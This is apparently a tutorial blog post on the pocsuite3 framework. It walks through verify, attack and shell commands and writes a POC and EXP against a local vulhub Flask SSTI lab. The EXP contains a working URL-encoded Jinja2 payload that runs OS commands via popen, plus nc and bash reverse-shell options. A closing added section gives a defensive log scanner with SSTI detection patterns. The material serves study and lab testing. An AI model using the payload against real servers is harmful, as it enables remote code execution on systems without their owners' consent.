Author: guko
pocsuite is a remote vulnerability verification framework built around vulnerabilities and POCs. This post records its basic usage and my study notes on writing POCs and EXPs for it.
0x01 Installation
Download the archive and unpack it directly:

```shell
wget https://github.com/knownsec/pocsuite3/archive/master.zip
unzip master.zip
```
0x02 Usage
Pocsuite has two interaction modes: a command-line mode and a console (interactive) mode. The `--verify` parameter invokes the POC's verify method, which checks whether the target is vulnerable; the `--attack` parameter invokes the attack method, which launches the exploit against the target.

1. verify mode: check whether the target is vulnerable. `-r` is the script path, `-u` is the target address.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --verify
```

2. Batch verification: write all target IPs to be verified into a txt file and run the POC against them in bulk.

```shell
python3 pocsuite.py -r pocs/test1.py -u url.txt --verify
```

3. Load every POC in a folder and test them against the target; here `-r` is the folder path.

```shell
python3 pocsuite.py -r pocs/* -u url --verify
```

4. Use multiple threads; `--threads` sets the number of threads.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --verify --threads <n>
```

5. Use the ZoomEye search engine to search for Redis services with port 6379 open.

```shell
python3 cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page 2
```

6. Attack mode: launch the exploit against the target.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --attack
```

7. Use the interactive shell mode to control the target remotely.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --shell
```

8. Use the custom `command` option to pass an externally supplied parameter for semi-interactive command execution.

```shell
python3 pocsuite.py -r pocs/test1.py -u url --attack --command "whoami"
```
0x03 Writing a POC script
Setting up the Flask test environment
The VULHUB environment is used here for a quick setup: https://github.com/vulhub/vulhub/tree/master/flask/ssti

```shell
docker-compose build
docker-compose up -d
```

For the actual script, replacing the template's `_verify` method with the Flask vulnerability check completes the POC:
```python
#!/usr/bin/python3
# Create a new .py file that follows the POC naming convention
# and implement the POC class DemoPOC, inheriting from POCBase
from collections import OrderedDict
from urllib.parse import urljoin
import re

from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']  # POC author
    vulDate = '1.1'  # vulnerability disclosure date
    updateDate = '1.1'  # date the POC was written
    references = ['flask']  # source of the vulnerability details
    name = 'flask'  # POC name
    appPowerLink = 'flask'  # vendor homepage
    appName = 'flask'  # affected application
    appVersion = '1.1'  # affected versions
    vulType = ''  # vulnerability type
    desc = '''
    test
    '''  # short description
    samples = ['00.00.00.00:8000']  # test samples: sites where the POC was verified
    install_requires = []

    # Verify mode: the POC check goes in _verify
    def _verify(self):
        result = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"  # arithmetic probe: a vulnerable template renders 484
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = payload
        except Exception:
            pass
        return self.parse_output(result)

    @staticmethod
    def trim(s):
        # Remove every space from a string (helper, not used by the template itself)
        newstr = ''
        for ch in s:  # iterate over each character
            if ch != ' ':
                newstr = newstr + ch
        return newstr

    # Attack mode: the EXP goes in _attack(). In attack mode the script does not
    # have to get a shell; it can, for example, query the admin account and password.
    def _attack(self):
        output = Output(self)
        result = {}
        # attack code
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
```
0x04 Writing an EXP script
Writing an EXP script is the same as writing a POC; only the `_attack` part needs to change, replaced with the exploitation script:
```python
    def _attack(self):
        result = {}
        path = "/?name="
        url = self.url + path
        # URL-encoded Jinja2 payload sent in the name parameter
        payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "www" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = payload
        except Exception:
            pass
        return self.parse_output(result)
```
This completes the EXP; run it as follows:

```shell
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack
```
Pocsuite3 can also accept command-line parameters entered by the user, giving semi-interactive control of the target system. First, write a function that accepts the custom command and assigns the received command to the `command` option:
```python
    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o
```
Next, create a `cmd` variable that receives the `command` parameter entered by the user and embed it in the payload string. Concatenate the finished payload with the URL and send it to the target with `requests`; the command is then executed on the target and its output is returned:
```python
    def _attack(self):
        result = {}
        path = "/?name="
        url = self.url + path
        # URL-encoded Jinja2 payload sent in the name parameter
        payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        try:
            resq = requests.get(url + payload)
            t = resq.text
            # strip line breaks and spaces from the response before reporting it
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ", "")
            if resq and resq.status_code == 200 and "www" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = t
        except Exception:
            pass
        return self.parse_output(result)
```
The finished code:
```python
#!/usr/bin/python3
from collections import OrderedDict
from urllib.parse import urljoin
import re

from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']  # POC author
    vulDate = '1.1'  # vulnerability disclosure date
    updateDate = '1.1'  # date the POC was written
    references = ['flask']  # source of the vulnerability details
    name = 'flask'  # POC name
    appPowerLink = 'flask'  # vendor homepage
    appName = 'flask'  # affected application
    appVersion = '1.1'  # affected versions
    vulType = ''  # vulnerability type
    desc = '''
    test
    '''  # short description
    samples = ['00.00.00.00:8000']  # test samples: sites where the POC was verified
    install_requires = []

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _verify(self):
        result = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"  # arithmetic probe: a vulnerable template renders 484
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = payload
        except Exception:
            pass
        return self.parse_output(result)

    def _attack(self):
        result = {}
        path = "/?name="
        url = self.url + path
        # URL-encoded Jinja2 payload sent in the name parameter
        payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        try:
            resq = requests.get(url + payload)
            t = resq.text
            # strip line breaks and spaces from the response before reporting it
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ", "")
            if resq and resq.status_code == 200 and "www" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['name'] = t
        except Exception:
            pass
        return self.parse_output(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
```
Run it:

```shell
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack --command 'id'
```
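Both the `{{22*22}}` probe that `_verify` sends and the URL-encoded `{% for c in [].__class__... %}` payload that `_attack` sends travel in the `name` query parameter, so they land verbatim in the web server's access log. The following is an added example, not part of the original post or of pocsuite3: a stdlib-only Python scanner that URL-decodes each request target from constructed combined-format log lines and flags the arithmetic probe, Jinja2 delimiters, the `__class__`/`__subclasses__` gadget-chain traversal, and OS-execution keywords, so the operator of a vulhub-style Flask app can see a run of this POC/EXP in their logs. The log lines, client IPs, and rule names are constructed for the example.

```python
"""Access-log scanner for the SSTI probe and payload patterns used above.

Added example, not part of the original post or of pocsuite3. The log
lines, client IPs and rule names below are constructed for illustration.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined/common log format: client ip, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Rules in evaluation order; each hit is reported by name.
RULES = [
    # the cheap {{22*22}}-style probe a POC's _verify sends first
    ("ssti-arith-probe", re.compile(r"\{\{\s*\d+\s*\*\s*\d+\s*\}\}")),
    # any Jinja2 expression or statement delimiter inside user input
    ("ssti-delimiter", re.compile(r"\{\{|\{%")),
    # object-graph traversal used to reach interpreter internals
    ("ssti-gadget-chain", re.compile(r"__class__|__subclasses__|__globals__|__import__")),
    # keywords that turn template access into OS command execution
    ("ssti-os-exec", re.compile(r"\bpopen\b|\beval\b|os\.system")),
]


def decoded_input(target):
    """Return the decoded path and every query value of a request target.

    parse_qsl decodes percent-encoding once; the extra unquote() catches the
    double-encoded variant (%257B -> %7B -> {) that a naive filter misses.
    """
    parts = urlsplit(target)
    values = [unquote(parts.path)]
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        values.append(unquote(value))
    return values


def classify(target):
    """Return the names of every rule the decoded request target matches."""
    haystack = "\n".join(decoded_input(target))
    return [name for name, pattern in RULES if pattern.search(haystack)]


def scan_log(lines):
    """Return one finding per request that trips at least one rule.

    Lines that are not in combined format are skipped, not raised on, so a
    junk line cannot stop the scan of a whole file.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m.group("target"))
        if rules:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "rules": rules,
            })
    return findings


def by_client(findings):
    """Count findings per client ip so repeated probing from one source stands out."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample log: a benign request, a JSON-looking parameter (single
# braces, must not fire), the arithmetic probe, a gadget-chain fragment shaped
# like the post's payload, an os-exec keyword, a double-encoded probe, and junk.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /?name=alice HTTP/1.1" 200 17',
    '192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /api?q=%7B%22a%22%3A1%7D HTTP/1.1" 200 2',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /?name=%7B%7B22*22%7D%7D HTTP/1.1" 200 12',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /?name=name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%7B%25%20endfor%20%25%7D HTTP/1.1" 200 14',
    '198.51.100.7 - - [10/Oct/2023:13:56:03 +0000] "GET /?name=%7B%7B%20x.popen(%22id%22).read()%20%7D%7D HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Oct/2023:13:56:04 +0000] "GET /?name=%257B%257B7*7%257D%257D HTTP/1.1" 200 12',
    'not a log line at all',
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], ",".join(f["rules"]), f["target"])
    print("per-client:", by_client(scan_log(SAMPLE_LOG)))
```

Run it on a real `access.log` by replacing `SAMPLE_LOG` with the file's lines; a `200` on a request that trips `ssti-arith-probe` is the strongest signal, since it means the template engine evaluated the expression, while a `500` on a gadget-chain request still shows that someone is working through the object graph even if that particular attempt failed.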
References
Python安全攻防渗透测试实战指南 (Python Security Attack and Defense: A Practical Guide to Penetration Testing)